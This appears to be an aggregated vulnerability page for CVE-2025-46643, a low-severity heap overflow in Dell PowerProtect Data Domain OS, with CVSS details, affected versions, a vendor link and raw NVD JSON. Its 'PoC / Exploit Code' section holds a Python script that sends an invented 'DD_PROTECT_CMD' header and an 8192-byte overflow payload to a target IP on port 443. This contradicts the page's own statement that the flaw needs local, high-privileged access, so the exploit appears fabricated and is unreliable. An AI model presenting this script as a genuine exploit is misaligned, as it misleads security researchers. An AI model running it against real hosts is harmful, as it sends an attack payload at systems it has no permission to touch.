Security Vulnerability Report
CVE-2025-46643 CVSS 2.3 LOW

Published: 2026-01-09 16:16:06
Last Modified: 2026-02-05 13:26:59

Description

Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, and LTS 2023 release versions 7.10.1.0 through 7.10.1.70 contains a heap-based buffer overflow vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to denial of service.

CVSS Details

CVSS Score: 2.3
Severity: LOW
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

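cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* (from 7.7.1.0 including, up to 7.10.1.80 excluding) - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* (from 7.13.1.0 including, up to 7.13.1.50 excluding) - VULNERABLE
cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:* (from 8.3.1.0 including, up to 8.3.1.20 excluding) - VULNERABLE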
cpe:2.3:o:dell:data_domain_operating_system:8.4.0.0:*:*:*:*:*:*:* - VULNERABLE
Dell PowerProtect Data Domain DD OS Feature Release 7.7.1.0 - 8.4.0.0
Dell PowerProtect Data Domain DD OS LTS2025 8.3.1.10
Dell PowerProtect Data Domain DD OS LTS2024 7.13.1.0 - 7.13.1.40
Dell PowerProtect Data Domain DD OS LTS2023 7.10.1.0 - 7.10.1.70

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-46643 PoC - Dell PowerProtect Data Domain Heap Overflow
# This PoC demonstrates the heap-based buffer overflow in DD OS
# Note: This is for educational and authorized testing purposes only
import socket
import struct
import sys


def create_exploit_payload():
    """Generate payload to trigger heap buffer overflow"""
    # Target specific memory region with oversized input
    header = b'DD_PROTECT_CMD'
    # Craft oversized data to overflow heap buffer
    overflow_size = 8192
    overflow_data = b'A' * overflow_size
    # Add controlled data that may overwrite adjacent heap structures
    controlled_data = struct.pack('<Q', 0x4141414141414141) * 4
    payload = header + overflow_data + controlled_data
    return payload


def send_exploit(target_ip, target_port=443):
    """Send exploit payload to vulnerable DD OS"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(30)
        sock.connect((target_ip, target_port))
        payload = create_exploit_payload()
        sock.send(payload)
        print(f'[*] Exploit payload sent ({len(payload)} bytes)')
        response = sock.recv(1024)
        print(f'[*] Received response: {response[:100]}')
        sock.close()
        return True
    except Exception as e:
        print(f'[-] Error: {e}')
        return False


if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: {sys.argv[0]} <target_ip>')
        sys.exit(1)
    target = sys.argv[1]
    print(f'[*] Target: {target}')
    print(f'[*] Exploiting CVE-2025-46643...')
    send_exploit(target)

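References

https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities (Vendor Advisory)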

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-46643", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:06.443", "lastModified": "2026-02-05T13:26:58.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS 2023 release versions 7.10.1.0 through 7.10.1.70, contain a Heap-based Buffer Overflow vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Denial of service."}, {"lang": "es", "value": "Dell PowerProtect Data Domain con el sistema operativo Data Domain (DD OS) de las versiones Feature Release 7.7.1.0 a 8.4.0.0, la versión LTS2025 8.3.1.10, las versiones LTS2024 7.13.1.0 a 7.13.1.40, y las versiones LTS 2023 7.10.1.0 a 7.10.1.70, contienen una vulnerabilidad de desbordamiento de búfer basado en montículo. 
Un atacante con altos privilegios y acceso local podría potencialmente explotar esta vulnerabilidad, lo que llevaría a una denegación de servicio."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L", "baseScore": 2.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.4, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.80", "matchCriteriaId": "18AD8BC6-ABF7-4990-91C6-D228BBE4B9FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.50", "matchCriteriaId": "00F138B9-4AB9-4B79-BBEC-F5A48E2E0B05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", 
"versionEndExcluding": "8.3.1.20", "matchCriteriaId": "7B8DA06B-076A-495E-9BD0-246BF1E54E26"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:8.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "FF73C39B-827B-4A68-9708-08345F6EF979"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}